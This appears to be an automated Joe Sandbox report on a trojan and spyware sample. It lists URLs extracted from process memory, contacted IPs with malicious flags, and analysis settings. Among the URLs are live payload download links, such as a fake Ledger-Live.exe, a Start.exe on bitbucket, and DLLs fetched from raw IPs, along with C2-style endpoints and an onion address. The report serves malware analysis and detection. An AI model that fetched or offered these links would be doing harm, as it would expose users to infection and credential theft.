https://carthewasher.net/m	i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	false
https://iplis.ru:443/1aFYp7.mp308:15:16	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://carthewasher.net/q	i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/css/al/vk_sans_display.5625d45f.css	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
http://www.avantbrowser.com)MOT-V9mm/	KUc3lCE6xAEEreIlM0ct4583.exe	false
https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill	KUc3lCE6xAEEreIlM0ct4583.exe	false
http://185.172.128.6/timeSync.exeC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
http://193.233.132.139/silno/download.phpC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
https://aui-cdn.atlassian.com/	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/dist/web/docs.043e7b59.js	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
http://5.42.66.22/space.phpC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
https://turnitin.com/robot/crawlerinfo.html)cannot	KUc3lCE6xAEEreIlM0ct4583.exe, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	false
http://www.exabot.com/go/robot)Opera/9.80	KUc3lCE6xAEEreIlM0ct4583.exe	false
https://statstraffic.org	RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C010000.00000004.00001000.00020000.00000000.sdmp	true
https://sun6-22.userapi.com/EL	i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625ADA000.00000004.00000020.00020000.00000000.sdmp	false
https://bitbucket.org/ixef571134343/ef571134343/downloads/Start.exe1H	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
http://5.42.66.22/getimage.phpO	i1crvbOZAP.exe, 00000000.00000002.1961249702.0000029625A02000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/dist/web/chunks/palette.361d379a.css	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ip.sb/ip	cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.com/accounts/o8/.well-known/host-meta?hd=	i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	false
http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onion	RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2182590732.000000000C01A000.00000004.00001000.00020000.00000000.sdmp	true
http://www.google.com/bot.html)crypto/ecdh:	KUc3lCE6xAEEreIlM0ct4583.exe	false
https://st6-20.vk.com/dist/web/chunks/vkcom-kit.2afa9163.js	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	false
https://bitbucket.org:80/ixef571134343/ef571134343/downloads/Start.exe	i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625A2C000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1961249702.0000029625A3A000.00000004.00000020.00020000.00000000.sdmp	false
https://sun6-22.userapi.com/	i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AD8000.00000004.00000020.00020000.00000000.sdmp	false
http://www.spidersoft.com)	KUc3lCE6xAEEreIlM0ct4583.exe	false
https://www.ecosia.org/newtab/	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000003.2021400787.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/css/al/fonts_cnt.c7a76efe.css	i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
http://https://_bad_pdb_file.pdb	KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp	false
https://triedchicken.net:80/cad54ba5b01423b1af8ec10ab5719d97.exe	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp	false
https://stats.vk-portal.net	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A52000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C4D000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1959313300.0000029623C55000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.65/Ledger-Live.exesposition:	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	false
http://46.226.167.187/api/flash.phpz	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623CF3000.00000004.00000020.00020000.00000000.sdmp	false
https://r.mradx.net	i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
http://www.google.com/feedfetcher.html)HKLM	KUc3lCE6xAEEreIlM0ct4583.exe, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	false
https://vk.com/doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdBUKr	i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/namehttps://ipgeolocation.io/status	i1crvbOZAP.exe, 00000000.00000002.1967460420.00007FF6491E5000.00000002.00000001.01000000.00000003.sdmp, i1crvbOZAP.exe, 00000000.00000003.1618451810.0000029625940000.00000004.00001000.00020000.00000000.sdmp	false
https://blockchain.infoindex	RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	false
https://cdn.cookielaw.org/	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685003043.0000029625BC9000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.65/Ledger-Live.exe00	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmp	false
http://185.172.128.26/8e6d9db21fb63946/nss3.dllO	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	false
http://reltype.google.com/openid/xrd-op	i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	false
https://monoblocked.com/525403/setup.exexe	i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	false
https://static.vk.me	i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
http://176.113.115.135/gyhuC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false
http://www.alexa.com/help/webmasters;	KUc3lCE6xAEEreIlM0ct4583.exe	false
http://www.idmanagement.gov/schema/2009/05/icam/openid-trust-level1.pdfuhttp://www.idmanagement.gov/	i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	false
https://st6-20.vk.com/dist/web/jobs_devtools_notification.14f96f02.js	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://triedchicken.net/a	i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.css	i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://294anacamptometer.sbs/bjhgvfdS	i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ADE000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/css/al/base.7c74f023.css	i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625A5B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	i1crvbOZAP.exe, 00000000.00000003.1728465989.0000029629F9D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.26/8e6d9db21fb63946/vcruntime140.dllQ	D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false
https://iplis.ru/v	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://iplis.ru/	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625BF2000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C8F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://iplis.ru:443/1pRXr7.txt	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://st6-20.vk.com/dist/web/unauthorized.20074c02.css	i1crvbOZAP.exe, 00000000.00000003.1756515030.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1745957875.000002962609B000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626004000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1753463710.0000029626076000.00000004.00000020.00020000.00000000.sdmp	false
https://carthewasher.net/	i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp	false
https://monoblocked.com/	i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	false
https://iplis.ru/m	i1crvbOZAP.exe, 00000000.00000002.1963819171.0000029625B93000.00000004.00000020.00020000.00000000.sdmp	false
https://cdn.ampproject.org	i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/xri/xrd/2009/01#canonicalize-raw-octets	i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	false
https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exeC:	i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.233.132.139	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
78.46.229.36	unknown	Germany	24940	HETZNER-ASDE	false
104.26.9.59	api.myip.com	United States	13335	CLOUDFLARENETUS	false
52.216.219.33	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
18.205.93.0	bitbucket.org	United States	14618	AMAZON-AESUS	false
172.67.218.160	kilojagger.com	United States	13335	CLOUDFLARENETUS	false
46.226.167.187	unknown	Russian Federation	16230	SKYNET-ASSkynetLTDEkaterinburgRussiaRU	true
104.21.82.182	carthewasher.net	United States	13335	CLOUDFLARENETUS	false
104.21.22.54	act.fishoaks.net	United States	13335	CLOUDFLARENETUS	false
176.113.115.135	unknown	Russian Federation	49505	SELECTELRU	false
172.67.132.113	iplogger.org	United States	13335	CLOUDFLARENETUS	false
5.42.66.22	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
95.142.206.0	sun6-20.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.164.45.22	d.392391234.xyz	Gibraltar	29632	NASSIST-ASGI	true
95.142.206.2	sun6-22.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
95.142.206.1	sun6-21.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.21.63.150	iplis.ru	United States	13335	CLOUDFLARENETUS	false
5.42.65.0	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
195.20.16.46	unknown	Finland	42297	EITADAT-ASFI	false
130.164.189.20	ngovpn.com	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
185.172.128.65	unknown	Russian Federation	50916	NADYMSS-ASRU	false
193.233.132.67	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.26.4.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
185.172.128.6	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.26	unknown	Russian Federation	50916	NADYMSS-ASRU	true
23.47.27.74	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.104.85.160	unknown	United States	16625	AKAMAI-ASUS	false
93.186.225.194	vk.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.21.42.248	294anacamptometer.sbs	United States	13335	CLOUDFLARENETUS	false
87.240.190.89	ps.userapi.com	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
5.42.65.117	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
172.67.180.119	triedchicken.net	United States	13335	CLOUDFLARENETUS	false
37.255.238.137	nidoe.org	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
162.19.138.79	centrosmissextensions.com	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
45.130.41.108	monoblocked.com	Russian Federation	198610	BEGET-ASRU	false
104.21.36.53	cybervincent.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1416900
Start date and time:	2024-03-28 09:14:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	i1crvbOZAP.exe renamed because original name is a hash value
Original Sample Name:	4204b9d4c4df5c4b4d67922db24f342a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@132/206@30/38
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 80% Number of executed functions: 200 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.221.242.90, 20.42.73.29, 20.189.173.21, 13.89.179.12, 20.189.173.20, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, hDKjcHsRQifZLtWksCNqPALBxed.hDKjcHsRQifZLtWksCNqPALBxed, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target KUc3lCE6xAEEreIlM0ct4583.exe, PID 7648 because there are no executed function
Execution Graph export aborted for target g1nHVnlr2tXTEWQsRz_M547D.exe, PID 7640 because it is empty
Execution Graph export aborted for target i1crvbOZAP.exe, PID 6984 because there are no executed function
